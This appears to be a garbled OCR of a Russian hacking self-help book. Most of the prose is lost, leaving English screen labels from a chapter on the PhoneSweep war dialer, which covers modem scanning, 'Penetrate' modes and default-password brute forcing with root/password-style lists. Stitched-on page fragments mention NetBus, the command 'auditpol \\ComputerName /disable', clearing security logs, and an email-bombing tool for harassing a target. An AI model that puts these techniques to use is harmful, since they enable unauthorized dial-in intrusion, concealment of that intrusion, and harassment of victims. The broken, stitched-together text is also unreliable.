, , ,
.

, - . , PhoneSweep
,

(, ).
fhoneSweep .
PhoneSweep - , .
, - .
-
Windows.
PhoneSweep . PhoneSweep .
Windows 95/98/NT/2000/XP.
.

/
(Point-to-Point protocol - ).
.
, 1 4.
, .
PhoneSweep.
178
fttoneSweep
PhoneSweep Demo , -.
(. 11.1).
This is a demonstration version of Sandstorm
Enterprises' PhoneSweep (tm)telephone
scanning application. The demonstration version
will NOT actually test computer system securiv
on telephone networks. It may be used and
distributed freely, provided that neither the
program nor its components are modified, and
that Sandstorm's copyright remains intact.
End User License Agreement
Sandstorm Enterprises Inc. ("Sandstorm") and/or
its suppliers own these programs and their
documentation, which are protected under
applicable copyright laws. Your right to use the
programs and the documentation is limited to the
terms and conditions described below.
1. Licens e: YOU MAY: (a) use the enclosed
programs one single computer; (to) physically
transfer the programs from one computer to
another; (c) make a copy of the programs for
| [Accept | | I Decline | | Copy to Clipboard |
i- Load Profile _^^^^^^^
I New
Current
Select From List
Puc. 11.1. PhoneSweep

> Default ( ),
Current () I Accept ( ). PhoneSweep 4.4 Demo, . 11.2.
PhoneSweep 4.4 Demo
File (), View () Help (). ,
. , .
PhoneSweep 4.4 Demo
PhoneNumbers ( ), Results (), Status (),
History () Setup (). , .
179
MMol
rnlhost - DEFAULT
File View Help
>. ru
Start Stop [Rescanj
6*
Save Rsvert Default
Import Export Report Graph
Dist
Ik?
4%
Ehone Numbers [ Besulls |j Status

Status|
IHistory
History |
I Setup
Prefix V | Number
%555-00
[A | Time | r,
[Result
|-Qf System ID
|l
Add
PMC. 11.2. PhoneSweep

PhoneSweep 4.4 Demo
.

(. ).
PhoneSweep 4.4 Demo , . , . , PhoneSweep ,
/ , , , , .
, PhoneSweep .

, (
).
Start (). ; Start (), ,
180

. 11.3, . , Default ,

Setup ().
|t*51 PhoneSweep 4 4 Demo - localhost - DEFAULT
file View Help
Start Stop Rescon

>
Seve
6*
&
Revert Default
Dist
Whet's this?
Start Now
J Schedule Start...
History
R? Cancel Scheduled Start
me
Setup
[Modem
[Result
j-U| System ID
ji
Schedule Stop...
Cancel Scheduled Slop
nra -BFF- ra -CFF- ?

. 11.3.
Stop (). .
Stop () ,
.
Rescan ( ).
, .
PhoneSweep Demo - New Profile (PhoneSweep Demo - ),
. 11.4.
IOEFAULT
1
|
OK
||
Cancel |
PMC. 77.4.
Save (). ,
.
181

Revert (). ,
, .
Default ( ). .
Import ().
/ bruteforce.txt.
Export (). ( ),
.
Report (). , , .
Graph ().
( Excel 2000).
What's This? ( ). ,
PhoneSweep 4.4 Demo - .

PhoneSweep 4.4 Demo

(. 11.5) ,
.
, Profiles
(), Setup (), . 11.3.
Open (). .
^ Profiles () . 11.5.
New profile ( ). . Profiles () . 11.5.
Copy profile ( ).
( ).
Profiles () . 11.5.
182
File View Help
>.
Start Stop
Rescan
Save
Rawert Default
Import Export Report
Graph
Disi
n?
What's this?
Ehone Numbers | Besults | Status | History | Setup

"511"518|
K
' profile for PhoneSweep

This is a demonstration
4 0 Demo.
Click in this box to edit this note.
or dick on "New" to create a new profile.
Open
New
E
Copy
Delete
Puc. 11.5.
Profiles ()
Delete (). .
Profiles () . 11.5.
Save (). ,
, . Profiles ()
. 11.5.
Undo (). . Profiles ()
. 11.5.
Freeze (). History
() .
Freeze () Thaw (). Freeze ()
History () . 11.6.
Thaw (). History ().
History () . 11.6.
Clear (). . History () Phone Numbers (
) . 11.6.
183

File View Help
Start
Stop
Rescen
Save Revert Default
II
Phone Numbers [| Results | Status [ History [Setup
[Modem
200M3-2PJJJ47
:
20-03 2011:47"
2003-03-2011:16
[Number
?BM003_
"555-2004 '
|-a|SystemlD
[Result
| User ID
_NO,FACSIMILE
_____
II
Freeze
Clear
[idle
Puc. 11.6. History ()

Add (). . Phone Numbers ( ) . 11.3. Clear () Add () Add Phone Numbers ( ), . 11.7
Add ().
Hphonesweep 4 4 Demo - Add ... ]
From: |
:
Note:
! Business Outside
Each Time Period
Weekend | All |
<) Any Time Period
51
. 11.7.
Delete ().
.
Add/Save (/).
, Add Phone Numbers ( ).
184

PhoneSweep
. ,
. ,
,
.
Sweeping Indicator ( ) - ,
.
Scheduled Start On/Off ( /) - ,
( ,
).
Scheduled Start Time ( ) - OFF.
Scheduled Stop On/Off ( /) - ,
( ,
).
Scheduled Stop Time ( ) - OFF.
Effort level ( ) - - , , .
Phonenumbers to Dial ( ) - , . , .
Report Status ( ) - ,
, ; - ;
- .
Time Period ( ) - - , , .
Remote Access Indicator ( ) - , PhoneSweep
. , .
-
PhoneSweep , .
185
fadoma flioneSweep
PhoneSweep, .
> PhoneSweep Setup (), . 11.5 .
> Phone Numbers ( ),
. 11.2, , Add (), Add
Phone Numbers ( ), . 11.7,
.
> PhoneSweep Start ()
.
, ,
(dialing riles).
&
PhoneSweep , ,
.
PhoneSweep, , , , -
.
, PhoneSweep
.

.
Add Phone Numbers ( ) (. 11.7)
: Business (), Outside (), Weekend
().
PhoneSweep ,
, , , .
186

Time (), Setup (), . 11.8.
||
File View Help
i~~&~~~*
>.
Start Stop Rescon
Save Revert Default
it
s1
Dist
What's this?
III!
| 7%
Ehone Numbers |BesuKs | Status || history ]~S~etup

Profiles I Modems I [lime] | Effort | Dialing Remste || Alerts I
Time Period
Start Hrs Minutes End Mrs Minutes
Business Hours: 09
Blackout Hours:
aioo lie ai59

loo aioo
00
Weekends: Q Monday Q TuesdayD WednesdayD ThursdayQ Friday

0 Saturday 0 Sunday
Import Time Periods: 0 Business 0 Outside 0 Weekend
Delay Between Calls fs
E!s
3 Seconds
Time Period Rings

Seconds
Business:
4 or 50
Outside:
10
'
or 92
Weekend:
10
or |92
1+41111
PMC. 77.5.

Business Hours ( ) Blackout Hours ( )

, , , , .
Weekends () ( ). Import Time
Period ( ) , .
Time () Rings
() Seconds (), , , , .
Business ( ), Outside ( ) Weekend
(). , . 11.8 , 10 , 92 .
, Time ()
, .
?
- Effort ().
187

Effort () . 11.9.
] PhoneSweep 4 4 Demo - localhost - DEFAULT
File View Help
X
Start Stop Rescon
Save Revert Default
mport Export Report Graph
N?
What's this?
1111
Ehone Numbers |j Besults |i Status^ Histoiy J Setyp |_
Proges ][Modgini^| IlmeJ Eton [ ginlirig | Remale_
Current Effort Level:
Connectto answering phone numbers
then disconnect immediately.
Set Level:
Connect
Scan For:
Modems Only
Penetrate Level Options:

Maximum Guesses Per Username Per Day:
Maximum Calls Per Number Per Day:
El Recycle Names
El Find Modems First
3
Username
root
(Password
password
root
syzygy
guess
123
Puc. 11.9.
. 11.9, ,
. Set Level ( ) ,
( Connect ()),
( Identity
()), (
Penetrate ()). Scan For () / ,
(, , , ?).
Penetrate Level Options ( )
, ..
. Maximum Guesses Per Username Per Day ( )
() . , ,
- . ,
,
188

Maximum Calls
Per Number Per Day ( ).
/, ,
bruteforce.txt,
Effort (), . 11.9. , Add () Del ().
/
Recycle Names ( ). Recycle Names (
) PhoneSweep
/ ,
/.
, Find Modems First ( ) PhoneSweep
.
.
PhoneSweep , /. .
bruteforce.txt: /,
PhoneSweep . brutecreate.exe,
/ bruteforce.txt.
systemdefault.txt: /,
.
( )
bruteforce.txt.
largebrute.txt: ,
.
largebruteback.txt: ,
largebrute.txt, .
, PhoneSweep ,
. - ! , ,
, PhoneSweep 1000$, ,
2800$ 2002 , - PhoneSweep . ! - , , -
189

, PhoneSweep - ,
, .
- THN-Scan ToneLock
,
. , - Login Hacker (
, , [3]). ,
, ...
- -
.
, , TeleSweep Secure
(http://www.securelogix.com) Secure Logix.OdnaKO, [14], TeleSweep Secure
- , .
, , - .
-
.
, , , - ,
.
PhoneSweep -
, ,
, , . PhoneSweep
, , - .

, , , .
190

1. 2000-2003 .
2.
.. - .: -, 2001. - 624 .: .
3.
- ., ., . . , 2- .: . . - .: ,
2001.- 656 .: . - . . .
4. - ., ., . . Windows
2000 - .; . . - .: ,
2002.- 264 .: . - . . .
5.
. .
. - 560 . - .: ,
2002.- ( ).
6. . . Windows 2000.:
Windows 2000.: . . - .: , 2001. - 592
.: . - . . .
7.
Alex JeDaev . - .:
, 2002 - 432 .: .
8.
. . (+CD). .:, 2002. - 864 .: .
9.
.. .: . . - .: +, .:
, .: -, 2001.- 272 .
10. . .
- .: ,
2000. - 736 .
11. ., . . Web- .; . . - .: , 2003.384 .: . - . . .
.;
'
'
12. . , . .
- .: . 2002. - 848 .: .
13. - , .
14. - ., ., . . , 3- .: . . - .: ,
2002.- 736 .: . - . . .

( , , , - 3000, 25 )
: (095) 720-07-65, (095) 772-19-56. E-mail: opt@triumph.ru

-: www.3st.ru
-: 125438, ., / 18 . E-mail: post@triumph.ru
:

-
-
, Alex Atsctoy.
.
.. .
.. .
. 125438, . , / 18.
00033 10.08.99 .
- 12.01.2005 .
70100'/|- . . . 12.
5830.
3 500 .

143200, . , . , 93
www.3st.ru
ISBN 5 - 9 3 6 7 3 - 0 3 6 - 0
8.
"I
"7 8 5 93 6 "73 03 68 I
: (095) 720 07 65
<=>?
SSI
os-
S 3
i!
t.
E-mail: opt@triumph.ru

Самоучитель хакера подробное иилюстрированное руководство

Загружено:

Сведения о документе

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Самоучитель хакера подробное иилюстрированное руководство

Загружено:

Авторское право:

Доступные форматы

Alex Atsctoy

2. 231 WmdOMS 2OOO/XP. .............................................. 25

10. Windows 2/.

PMC. 3.1. NTFSDOS Pro

Pro uses copies of several files located in your Windows NT/200Q/XP

. .5. NTFSDOS Pro

floppy labelled NTFSDOS Professional 0

Press Next to copy files ID A:V

. .6. NTFSDOS Pro

Copying files to diskette...

. .8. NTFSDOS Pro

Import From Local Machine

I <o InILM ra:

Use the Import menu to retrieve accounts to audit.

Puc. 3.10. SAM

Common letter substitutions (much slower)

Custom Claraclw Set ch ch*:ttrt

Enter password to open file

> Select document ( )

| Display help info

| Check For Update) |

Text ol Window Under 'Circled V Cursor (il available)

Length of available text: 3

Reposition Revelation out of the way when dragging 'circled V

"Host informationDestination: |SWORD-200

User name: |Administrator

Puc. 3.17. NetBus Sword-2000

0 Filter Out Arrow Keys

Import Binary Log From:

Save Text Log To:

Start: REG_DWORD: 0x3

Puc. 3.21. Windows

Your Browser Type and Operating System:

Web -, - (Proxy server)

C:\Auditpol>auditpol \\ComputerName /disable

Event Viewer [Local]

Delete all records n the log

Puc. 4.7. Windows

Do you want lo save "Security" before clearing it?

<SCRIPT event=NavigateComplete2(b) for=Il>

Address us) aboutlnternet-Mara3KH--BublikilBaranki"

Death and Desliuclion 4.0

Send bomb to:

|7| 0 Randomly Change | EdilL

jendjombjl | Edil Headers | | Abort | | Clear | | Clone | fy

Email Bombing is rarely damaging

i-Size of BombIB Randomly Change [ ,Usages to send:

use the Edit He

Puc. 6.1. DnD

^ Random Servei List

] Imalasada.lava. | lpressentef.com | |cyberhighway.n|

wwa.com J |nyx1G.cs.du.ed| | clinet.fi

Puc. 6.5. MIME

Say bomb is from:

llnllml| I Edit Headers | | Abort || Clear

*i Subscribe joe lamei to a mailing list!

Subscribe your enemy to a mailing list even worse then a mailbomb!

Targets email address:

Digital Queers Gay Quakers

Targets fits! name:

Targets last name:

Puc. 6.8. DnD

* Randomic Passwoid Geneialor

Jusl click to generate a random password. Choose how long